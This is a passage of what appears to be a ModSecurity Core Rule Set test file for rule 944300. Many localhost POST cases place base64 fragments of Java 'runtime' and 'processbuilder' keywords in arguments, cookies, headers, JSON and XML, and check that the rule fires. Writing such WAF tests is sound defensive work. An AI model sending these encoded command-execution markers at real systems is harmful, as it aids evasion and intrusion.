"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-19 + desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-20 + desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HJ1bnRpbWU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-21 + desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HJ1bnRpbWU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-22 + desc: "Argument test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-23 + desc: "Argument name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-24 + desc: "Cookie test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BydW50aW1l + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-25 + desc: "Cookie name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BydW50aW1l=test + method: 
"POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-26 + desc: "Request header test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BydW50aW1l + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-27 + desc: "XML attribute value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-28 + desc: "XML element value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-29 + desc: "Nested XML element value includes keyword BydW50aW1l" + stages: 
+ - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-30 + desc: "Content-Type text/plain includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-31 + desc: "Content-Type application/json arg value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BydW50aW1l\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-32 + desc: "Content-Type application/json arg name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BydW50aW1l\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-33 + desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-34 + desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-35 + desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvY2Vzc2J1aWxkZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-36 + desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvY2Vzc2J1aWxkZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-37 + desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvY2Vzc2J1aWxkZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-38 + desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-39 + desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-40 + desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-41 + desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + 
log_contains: "id \"944300\"" + - test_title: 944300-42 + desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-43 + desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-44 + desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-45 + desc: "Argument name 
includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-46 + desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb2Nlc3NidWlsZGVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-47 + desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb2Nlc3NidWlsZGVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-48 + desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb2Nlc3NidWlsZGVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-49 + desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-50 + desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-51 + desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-52 + desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-53 + desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-54 + desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-55 + desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-56 + desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-57 + desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm9jZXNzYnVpbGRlcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-58 + desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm9jZXNzYnVpbGRlcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-59 + desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm9jZXNzYnVpbGRlcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-60 + desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-61 + desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-62 + desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-63 + desc: 